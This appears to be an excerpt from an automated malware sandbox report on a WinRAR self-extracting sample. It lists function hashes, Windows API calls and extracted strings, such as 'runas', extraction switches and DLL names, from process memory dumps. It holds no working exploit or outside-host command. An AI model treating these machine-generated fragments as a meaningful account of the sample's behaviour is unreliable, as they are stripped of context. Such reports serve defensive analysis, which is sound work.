Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: InfoQuerySystemVirtual
String ID: D
API String ID: 401686933-2746444292
Opcode ID: 7c66600afbbca68bd627c33cb41f5793ded5bacdc1ae0872a43f023d6f29c22c
Instruction ID: 3e525bf342770f6a9dab326281730dfb908ef3bac29e78347d7e3d6d726f88e7
Opcode Fuzzy Hash: 7c66600afbbca68bd627c33cb41f5793ded5bacdc1ae0872a43f023d6f29c22c
Instruction Fuzzy Hash: C101A772600109ABDB14DF29DC49FED7BEAAFC4325F0DC224ED59D7154DA38D951C680

Function 00074040 Relevance: 5.2, APIs: 4, Instructions: 236memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00074793,00074793), ref: 0007417D
HeapFree.KERNEL32(00000000,00074793,00074793), ref: 00074183
GetProcessHeap.KERNEL32(00074694,?), ref: 000741B7
HeapFree.KERNEL32(00000000,00074694,?), ref: 000741BD

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: d92599fd293ee666a0ac1ba7a6687df167ccc6d8934efc21d5db8fc4887bcd13
Instruction ID: f3ee6b0937e1fd25ee4464f979b28b315ab9437ff06a10feae93b205d58bbcc4
Opcode Fuzzy Hash: d92599fd293ee666a0ac1ba7a6687df167ccc6d8934efc21d5db8fc4887bcd13
Instruction Fuzzy Hash: 4881D1B2E002059FE714DF58C840BAAB7E4FF51320F15866DE8199B381D779EE448BD4

Function 000C3680 Relevance: 5.1, APIs: 4, Instructions: 79COMMON

Download Yara Rule

APIs

Part of subcall function 000C93D0: SetEvent.KERNEL32(00000002,?,?,000C36BF,D11C52E5), ref: 000C93E6
Part of subcall function 000C93D0: GetLastError.KERNEL32(?,?,000C36BF,D11C52E5), ref: 000C93F0
Part of subcall function 000C93D0: WaitForSingleObject.KERNEL32(?,000000FF,?,?,000C36BF,D11C52E5), ref: 000C93FC
Part of subcall function 000C93D0: GetLastError.KERNEL32(?,?,000C36BF,D11C52E5), ref: 000C9407
Part of subcall function 000C93D0: CloseHandle.KERNEL32(?,?,?,000C36BF,D11C52E5), ref: 000C9411
Part of subcall function 000C93D0: GetLastError.KERNEL32(?,?,000C36BF,D11C52E5), ref: 000C941B

GetLastError.KERNEL32 ref: 000C36DC
GetLastError.KERNEL32 ref: 000C3707
CloseHandle.KERNEL32(75572EE0,D11C52E5), ref: 000C372C
GetLastError.KERNEL32 ref: 000C3736

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: ErrorLast$CloseHandle$EventObjectSingleWait
String ID:
API String ID: 2212007442-0
Opcode ID: a29210362d277092ba1270ed03388199e6f6434058cb6efff46861d5b1a818e6
Instruction ID: c9c18b531507cb8c013da35a0418da70c78b9438e11e1150cbe92a9f73c9ee97
Opcode Fuzzy Hash: a29210362d277092ba1270ed03388199e6f6434058cb6efff46861d5b1a818e6
Instruction Fuzzy Hash: A021A3B1904249EBDB24DF69D844B6EFBE8EB04720F20826ED81597780DB75AA00CB91

Analysis Process: Desktop.exePID: 7936, Parent PID: 7912COMMON

Execution Graph

Execution Coverage:	11.5%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	2000
Total number of Limit Nodes:	27

Executed Functions

Function 00007FF7BB25B190 Relevance: 123.9, APIs: 60, Strings: 10, Instructions: 1421windowfilesleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7BB23255C: GetDlgItem.USER32 ref: 00007FF7BB2325AC
Part of subcall function 00007FF7BB23255C: SetDlgItemTextW.USER32 ref: 00007FF7BB2325C8

EndDialog.USER32 ref: 00007FF7BB25B2D0
SetDlgItemTextW.USER32 ref: 00007FF7BB25B320
GetMessageW.USER32 ref: 00007FF7BB25B350
IsDialogMessageW.USER32 ref: 00007FF7BB25B369
TranslateMessage.USER32 ref: 00007FF7BB25B37B
DispatchMessageW.USER32 ref: 00007FF7BB25B389
EndDialog.USER32 ref: 00007FF7BB25B3D3
GetDlgItem.USER32 ref: 00007FF7BB25B410
IsDlgButtonChecked.USER32 ref: 00007FF7BB25B431
IsDlgButtonChecked.USER32 ref: 00007FF7BB25B449
SetFocus.USER32 ref: 00007FF7BB25B452
GetLastError.KERNEL32 ref: 00007FF7BB25B634
GetLastError.KERNEL32 ref: 00007FF7BB25B665
GetTickCount.KERNEL32 ref: 00007FF7BB25B68B
GetLastError.KERNEL32 ref: 00007FF7BB25B6F5
GetCommandLineW.KERNEL32 ref: 00007FF7BB25B841
CreateFileMappingW.KERNEL32 ref: 00007FF7BB25B900
MapViewOfFile.KERNEL32 ref: 00007FF7BB25B923
Sleep.KERNEL32 ref: 00007FF7BB25B9B6
UnmapViewOfFile.KERNEL32 ref: 00007FF7BB25B9DF
CloseHandle.KERNEL32 ref: 00007FF7BB25B9E8
SetDlgItemTextW.USER32 ref: 00007FF7BB25BCDE
DialogBoxParamW.USER32 ref: 00007FF7BB25C0D7
EndDialog.USER32 ref: 00007FF7BB25C0EF
EnableWindow.USER32 ref: 00007FF7BB25C2A6
IsDlgButtonChecked.USER32 ref: 00007FF7BB25C2F8
ShellExecuteExW.SHELL32 ref: 00007FF7BB25B95B

Part of subcall function 00007FF7BB24AAE0: LoadStringW.USER32 ref: 00007FF7BB24AB67
Part of subcall function 00007FF7BB24AAE0: LoadStringW.USER32 ref: 00007FF7BB24AB80

IsDlgButtonChecked.USER32 ref: 00007FF7BB25BEC3
SendDlgItemMessageW.USER32 ref: 00007FF7BB25BEEA
GetDlgItem.USER32 ref: 00007FF7BB25BEF8
IsDlgButtonChecked.USER32 ref: 00007FF7BB25BF12
GetDlgItem.USER32 ref: 00007FF7BB25BF4F
SetDlgItemTextW.USER32 ref: 00007FF7BB25BFEC
SetDlgItemTextW.USER32 ref: 00007FF7BB25C004
SetDlgItemTextW.USER32 ref: 00007FF7BB25C321
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7BB25C363
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7BB25C369
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7BB25C36F
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7BB25C375
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7BB25C37B
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7BB25C381
SendDlgItemMessageW.USER32 ref: 00007FF7BB25C449
EndDialog.USER32 ref: 00007FF7BB25C463
GetDlgItem.USER32 ref: 00007FF7BB25C491
SetFocus.USER32 ref: 00007FF7BB25C49A
SendDlgItemMessageW.USER32 ref: 00007FF7BB25C53E
FindFirstFileW.KERNEL32 ref: 00007FF7BB25C562
FindClose.KERNEL32 ref: 00007FF7BB25C68A
SendDlgItemMessageW.USER32 ref: 00007FF7BB25C7AF

Part of subcall function 00007FF7BB23129C: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7BB231396

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7BB25CAA9
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7BB25CAAF
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7BB25CAB5
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7BB25CABB
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7BB25CAC1
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7BB25CAC7

Strings

LICENSEDLG, xrefs: 00007FF7BB25C0C9
-el -s2 "-d%s" "-sp%s", xrefs: 00007FF7BB25B799
winrarsfxmappingfile.tmp, xrefs: 00007FF7BB25B8E0
runas, xrefs: 00007FF7BB25B7C9
@, xrefs: 00007FF7BB25B7B6
p, xrefs: 00007FF7BB25B7AB
STARTDLG, xrefs: 00007FF7BB25B1CA
%s %s, xrefs: 00007FF7BB25C6D9, 00007FF7BB25C946
__tmp_rar_sfx_access_check_, xrefs: 00007FF7BB25B6A9
REPLACEFILEDLG, xrefs: 00007FF7BB25C3D3

Memory Dump Source

Source File: 00000005.00000002.1440788917.00007FF7BB231000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7BB230000, based on PE: true

Associated: 00000005.00000002.1440764398.00007FF7BB230000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440830265.00007FF7BB278000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440860655.00007FF7BB28B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440860655.00007FF7BB294000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440904646.00007FF7BB29A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440904646.00007FF7BB29E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7bb230000_Desktop.jbxd

Similarity

API ID: Item$_invalid_parameter_noinfo_noreturn$Message$DialogText$ButtonChecked$FileSend$ErrorLast$CloseFindFocusLoadStringView$CommandConcurrency::cancel_current_taskCountCreateDispatchEnableExecuteFirstHandleLineMappingParamShellSleepTickTranslateUnmapWindow
String ID: %s %s$-el -s2 "-d%s" "-sp%s"$@$LICENSEDLG$REPLACEFILEDLG$STARTDLG$__tmp_rar_sfx_access_check_$p$runas$winrarsfxmappingfile.tmp
API String ID: 3303814210-2702805183
Opcode ID: c5bbe014e609139cb114cc60c171e21f4bc2997a70897e34b2ce553792c95928
Instruction ID: e3b0c6f545f533edf975ea9a4530dd3d534005248cc57ee088b733f6c9d6e879
Opcode Fuzzy Hash: c5bbe014e609139cb114cc60c171e21f4bc2997a70897e34b2ce553792c95928
Instruction Fuzzy Hash: C2D27161E0968295EA20BB2DE8942F9A361BFA7780FC04535DF8D466BDDF3CE544C720

Function 00007FF7BB260754 Relevance: 45.9, APIs: 21, Strings: 5, Instructions: 380
filesleeptimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF7BB24DFD0: GetModuleHandleW.KERNEL32(?,?,?,00000000,?), ref: 00007FF7BB24E018
Part of subcall function 00007FF7BB24DFD0: GetProcAddress.KERNEL32(?,?,?,00000000,?), ref: 00007FF7BB24E030
Part of subcall function 00007FF7BB24DFD0: GetProcAddress.KERNEL32(?,?,?,00000000,?), ref: 00007FF7BB24E05D

Part of subcall function 00007FF7BB2462DC: GetCurrentDirectoryW.KERNEL32 ref: 00007FF7BB2462F2
Part of subcall function 00007FF7BB2462DC: GetCurrentDirectoryW.KERNEL32 ref: 00007FF7BB24632C

Part of subcall function 00007FF7BB25946C: OleInitialize.OLE32 ref: 00007FF7BB259486
Part of subcall function 00007FF7BB25946C: SHGetMalloc.SHELL32 ref: 00007FF7BB2594D4

GetCommandLineW.KERNEL32 ref: 00007FF7BB26096E
OpenFileMappingW.KERNEL32 ref: 00007FF7BB260A07
MapViewOfFile.KERNEL32 ref: 00007FF7BB260A30
UnmapViewOfFile.KERNEL32 ref: 00007FF7BB260A46
MapViewOfFile.KERNEL32 ref: 00007FF7BB260A63
UnmapViewOfFile.KERNEL32 ref: 00007FF7BB260ACA
CloseHandle.KERNEL32 ref: 00007FF7BB260AD3
SetEnvironmentVariableW.KERNEL32 ref: 00007FF7BB260BAD
GetLocalTime.KERNEL32 ref: 00007FF7BB260BB8
swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF7BB260C13
SetEnvironmentVariableW.KERNEL32 ref: 00007FF7BB260C26
GetModuleHandleW.KERNEL32 ref: 00007FF7BB260C2E
LoadIconW.USER32 ref: 00007FF7BB260C4D
DialogBoxParamW.USER32 ref: 00007FF7BB260CB6
Sleep.KERNEL32 ref: 00007FF7BB260CE6
DeleteObject.GDI32 ref: 00007FF7BB260D0D
DeleteObject.GDI32 ref: 00007FF7BB260D1F
CloseHandle.KERNEL32 ref: 00007FF7BB260D67
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7BB260DD7
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7BB260DDD
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7BB260DE3

Part of subcall function 00007FF7BB25FD0C: SetEnvironmentVariableW.KERNEL32 ref: 00007FF7BB25FD43
Part of subcall function 00007FF7BB25FD0C: SetEnvironmentVariableW.KERNEL32 ref: 00007FF7BB25FDBC

Strings

sfxname, xrefs: 00007FF7BB260B9B
sfxstime, xrefs: 00007FF7BB260C1F
winrarsfxmappingfile.tmp, xrefs: 00007FF7BB2609F9
STARTDLG, xrefs: 00007FF7BB260CA5
%4d-%02d-%02d-%02d-%02d-%02d-%03d, xrefs: 00007FF7BB260C02

Memory Dump Source

Source File: 00000005.00000002.1440788917.00007FF7BB231000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7BB230000, based on PE: true

Associated: 00000005.00000002.1440764398.00007FF7BB230000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440830265.00007FF7BB278000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440860655.00007FF7BB28B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440860655.00007FF7BB294000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440904646.00007FF7BB29A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440904646.00007FF7BB29E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7bb230000_Desktop.jbxd

Similarity

API ID: File$EnvironmentHandleVariableView$_invalid_parameter_noinfo_noreturn$AddressCloseCurrentDeleteDirectoryModuleObjectProcUnmap$CommandDialogIconInitializeLineLoadLocalMallocMappingOpenParamSleepTimeswprintf
String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
API String ID: 1048086575-3710569615
Opcode ID: cf171760da93c4691ee509495d3afa31e70d11824e8d8503b99fa0ba8bf4b656
Instruction ID: 9d3e9d564025e8d08cf02526f36576436c012d284ab6e3105722ba92333036f2
Opcode Fuzzy Hash: cf171760da93c4691ee509495d3afa31e70d11824e8d8503b99fa0ba8bf4b656
Instruction Fuzzy Hash: 91127721E1978285EB10AB2DE8452F9A361FFAA754F804235DF9D46ABDDF3CE540C720

Function 00007FF7BB24A4AC Relevance: 23.0, APIs: 11, Strings: 2, Instructions: 250
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF7BB24A504

Part of subcall function 00007FF7BB250F68: WideCharToMultiByte.KERNEL32 ref: 00007FF7BB250F99

SetDlgItemTextW.USER32 ref: 00007FF7BB24A573
GetWindowRect.USER32 ref: 00007FF7BB24A5AD
GetClientRect.USER32 ref: 00007FF7BB24A5BB
GetWindowLongPtrW.USER32 ref: 00007FF7BB24A66C
GetWindowRect.USER32 ref: 00007FF7BB24A6B2
SetDlgItemTextW.USER32 ref: 00007FF7BB24A6EC
GetSystemMetrics.USER32 ref: 00007FF7BB24A6F7
GetWindow.USER32 ref: 00007FF7BB24A708
GetWindowRect.USER32 ref: 00007FF7BB24A746
GetWindow.USER32 ref: 00007FF7BB24A808

Strings

CAPTION, xrefs: 00007FF7BB24A6CF
$%s:, xrefs: 00007FF7BB24A4EF

Memory Dump Source

Source File: 00000005.00000002.1440788917.00007FF7BB231000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7BB230000, based on PE: true

Associated: 00000005.00000002.1440764398.00007FF7BB230000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440830265.00007FF7BB278000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440860655.00007FF7BB28B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440860655.00007FF7BB294000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440904646.00007FF7BB29A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440904646.00007FF7BB29E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7bb230000_Desktop.jbxd

Similarity

API ID: Window$Rect$ItemText$ByteCharClientLongMetricsMultiSystemWideswprintf
String ID: $%s:$CAPTION
API String ID: 1936833115-404845831
Opcode ID: 1224945cd41bf140f0dcf37f1b002595631e4f701a4b658f84a72e9da714e3d9
Instruction ID: 69746610df52101a9da68b1c120ef242d7dba799ce435edac7537abd4d2673b4
Opcode Fuzzy Hash: 1224945cd41bf140f0dcf37f1b002595631e4f701a4b658f84a72e9da714e3d9
Instruction Fuzzy Hash: C291C832B1864186E714AF3DA8446A9A7A1FB9A784F845535EF8D47B6CCF3CE805CB10

Function 00007FF7BB23F930 Relevance: 17.2, APIs: 8, Strings: 1, Instructions: 1417COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7BB241239
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7BB24123F
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7BB241245
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7BB24124B
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7BB241251
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7BB241257
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7BB24125D
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7BB241263

Strings

__tmp_reference_source_, xrefs: 00007FF7BB23FCCF, 00007FF7BB23FCDE

Memory Dump Source

Source File: 00000005.00000002.1440788917.00007FF7BB231000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7BB230000, based on PE: true

Associated: 00000005.00000002.1440764398.00007FF7BB230000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440830265.00007FF7BB278000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440860655.00007FF7BB28B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440860655.00007FF7BB294000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440904646.00007FF7BB29A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440904646.00007FF7BB29E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7bb230000_Desktop.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID: __tmp_reference_source_
API String ID: 3668304517-685763994
Opcode ID: 7c953252b80d9c6d828d99cffb63e66738df5846a4e2e92642ee3a83d7291b78
Instruction ID: 0a4e49c131bbbdca71f2d1b38f7b794a49e1186d4aa412521cfa47200cfbd025
Opcode Fuzzy Hash: 7c953252b80d9c6d828d99cffb63e66738df5846a4e2e92642ee3a83d7291b78
Instruction Fuzzy Hash: 3EE28662A086C196EA64EB2DE1403EEE761FBA6740F804132DF9D47AB9CF3CE455C710

Function 00007FF7BB234840 Relevance: 12.1, APIs: 5, Strings: 1, Instructions: 1624COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7BB23511E
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7BB235124
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7BB23512A
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7BB235E16
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7BB235E1C

Strings

CMT, xrefs: 00007FF7BB2359B2

Memory Dump Source

Source File: 00000005.00000002.1440788917.00007FF7BB231000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7BB230000, based on PE: true

Associated: 00000005.00000002.1440764398.00007FF7BB230000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440830265.00007FF7BB278000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440860655.00007FF7BB28B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440860655.00007FF7BB294000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440904646.00007FF7BB29A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440904646.00007FF7BB29E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7bb230000_Desktop.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID: CMT
API String ID: 3668304517-2756464174
Opcode ID: 55bf8bc242d77ff464b4b637a4409c1e03917795df1080568c491ddd117196ec
Instruction ID: 3c21b9df615f60f96200f0896dc44ba09a2cf563133bf331ea7378866cb7e884
Opcode Fuzzy Hash: 55bf8bc242d77ff464b4b637a4409c1e03917795df1080568c491ddd117196ec
Instruction Fuzzy Hash: 35E20722B186824AEB14EB3DD5502FDA7A1FB66784F800035DF5E476A9DF3CE559C320

Function 00007FF7BB2440BC Relevance: 10.7, APIs: 7, Instructions: 153
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileW.KERNELBASE ref: 00007FF7BB24410B
FindFirstFileW.KERNELBASE ref: 00007FF7BB24415E
GetLastError.KERNEL32 ref: 00007FF7BB2441AF
FindNextFileW.KERNEL32 ref: 00007FF7BB2441D7
GetLastError.KERNEL32 ref: 00007FF7BB2441E5
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7BB24430F
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7BB244315

Memory Dump Source

Source File: 00000005.00000002.1440788917.00007FF7BB231000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7BB230000, based on PE: true

Associated: 00000005.00000002.1440764398.00007FF7BB230000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440830265.00007FF7BB278000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440860655.00007FF7BB28B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440860655.00007FF7BB294000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440904646.00007FF7BB29A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440904646.00007FF7BB29E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7bb230000_Desktop.jbxd

Similarity

API ID: FileFind$ErrorFirstLast_invalid_parameter_noinfo_noreturn$Next
String ID:
API String ID: 474548282-0
Opcode ID: 3ee96c9aed3c94a745cca2dc02a0ae9902b722a9ff44476fc619c6065aa41b54
Instruction ID: 29af85474b403bef1970096778bf99eb415331942546441bb645bdee4fcdf9f7
Opcode Fuzzy Hash: 3ee96c9aed3c94a745cca2dc02a0ae9902b722a9ff44476fc619c6065aa41b54
Instruction Fuzzy Hash: 7861B762A08A4281EE10EB1DE4512ADA361FBA67A4F905331EFBD47AEDDF3CD544C710

Function 00007FF7BB24DFD0 Relevance: 143.9, APIs: 16, Strings: 66, Instructions: 440
libraryfileloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(?,?,?,00000000,?), ref: 00007FF7BB24E018
GetProcAddress.KERNEL32(?,?,?,00000000,?), ref: 00007FF7BB24E030
GetProcAddress.KERNEL32(?,?,?,00000000,?), ref: 00007FF7BB24E05D
CreateFileW.KERNEL32 ref: 00007FF7BB24E3F0
SetFilePointer.KERNEL32 ref: 00007FF7BB24E40E
ReadFile.KERNEL32 ref: 00007FF7BB24E436

Part of subcall function 00007FF7BB24DFD0: GetSystemDirectoryW.KERNEL32 ref: 00007FF7BB24DDDF

CompareStringW.KERNELBASE ref: 00007FF7BB24E559
CloseHandle.KERNEL32 ref: 00007FF7BB24E4F3

Part of subcall function 00007FF7BB231FA0: _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7BB231FFB

Part of subcall function 00007FF7BB2451A4: GetVersionExW.KERNEL32 ref: 00007FF7BB2451D5

Part of subcall function 00007FF7BB24DFD0: LoadLibraryW.KERNELBASE ref: 00007FF7BB24DEFF
Part of subcall function 00007FF7BB24DFD0: _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7BB24DFB5
Part of subcall function 00007FF7BB24DFD0: _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7BB24DFBB
Part of subcall function 00007FF7BB24DFD0: _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7BB24DFC1
Part of subcall function 00007FF7BB24DFD0: _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7BB24DFC7

AllocConsole.KERNEL32(?,?,?,00000000,?), ref: 00007FF7BB24E74B
GetCurrentProcessId.KERNEL32(?,?,?,00000000,?), ref: 00007FF7BB24E755
AttachConsole.KERNEL32(?,?,?,00000000,?), ref: 00007FF7BB24E75D
GetStdHandle.KERNEL32(?,?,?,00000000,?), ref: 00007FF7BB24E780
WriteConsoleW.KERNEL32(?,?,?,00000000,?), ref: 00007FF7BB24E799
Sleep.KERNEL32(?,?,?,00000000,?), ref: 00007FF7BB24E7A4
FreeConsole.KERNEL32(?,?,?,00000000,?), ref: 00007FF7BB24E7AA
ExitProcess.KERNEL32 ref: 00007FF7BB24E7BB

Strings

RpcRtRemote.dll, xrefs: 00007FF7BB24E363
dwmapi.dll, xrefs: 00007FF7BB24E0BD, 00007FF7BB24E661
rasadhlp.dll, xrefs: 00007FF7BB24E30F
profapi.dll, xrefs: 00007FF7BB24E205
wintrust.dll, xrefs: 00007FF7BB24E1B1
cscapi.dll, xrefs: 00007FF7BB24E22F
crypt32.dll, xrefs: 00007FF7BB24E187
dhcpcsvc6.dll, xrefs: 00007FF7BB24E31D
ntmarta.dll, xrefs: 00007FF7BB24E1F7
cryptbase.dll, xrefs: 00007FF7BB24E0C8
netutils.dll, xrefs: 00007FF7BB24E283
setupapi.dll, xrefs: 00007FF7BB24E141
atl.dll, xrefs: 00007FF7BB24E136
wkscli.dll, xrefs: 00007FF7BB24E2E5
rsaenh.dll, xrefs: 00007FF7BB24E0A7
ieframe.dll, xrefs: 00007FF7BB24E120
psapi.dll, xrefs: 00007FF7BB24E115
ws2_32.dll, xrefs: 00007FF7BB24E0FF
iphlpapi.DLL, xrefs: 00007FF7BB24E267
Please remove %s from %s folder. It is unsecure to run %s until it is done., xrefs: 00007FF7BB24E73B
dsrole.dll, xrefs: 00007FF7BB24E37F
aclui.dll, xrefs: 00007FF7BB24E371
kernel32, xrefs: 00007FF7BB24E011
propsys.dll, xrefs: 00007FF7BB24E2AD
ntshrui.dll, xrefs: 00007FF7BB24E12B
dfscli.dll, xrefs: 00007FF7BB24E2F3
shdocvw.dll, xrefs: 00007FF7BB24E179
samlib.dll, xrefs: 00007FF7BB24E2D7
imageres.dll, xrefs: 00007FF7BB24E24B
slc.dll, xrefs: 00007FF7BB24E23D
mlang.dll, xrefs: 00007FF7BB24E2BB
msasn1.dll, xrefs: 00007FF7BB24E195
WindowsCodecs.dll, xrefs: 00007FF7BB24E213
XmlLite.dll, xrefs: 00007FF7BB24E339
usp10.dll, xrefs: 00007FF7BB24E0DE
uxtheme.dll, xrefs: 00007FF7BB24E66D
devrtl.dll, xrefs: 00007FF7BB24E29F
apphelp.dll, xrefs: 00007FF7BB24E14F
ws2help.dll, xrefs: 00007FF7BB24E10A
dhcpcsvc.dll, xrefs: 00007FF7BB24E32B
SetDllDirectoryW, xrefs: 00007FF7BB24E026
srvcli.dll, xrefs: 00007FF7BB24E221
oleaccrc.dll, xrefs: 00007FF7BB24E1E9
cryptui.dll, xrefs: 00007FF7BB24E1A3
shell32.dll, xrefs: 00007FF7BB24E1BF
UXTheme.dll, xrefs: 00007FF7BB24E0B2
linkinfo.dll, xrefs: 00007FF7BB24E347
peerdist.dll, xrefs: 00007FF7BB24E38D
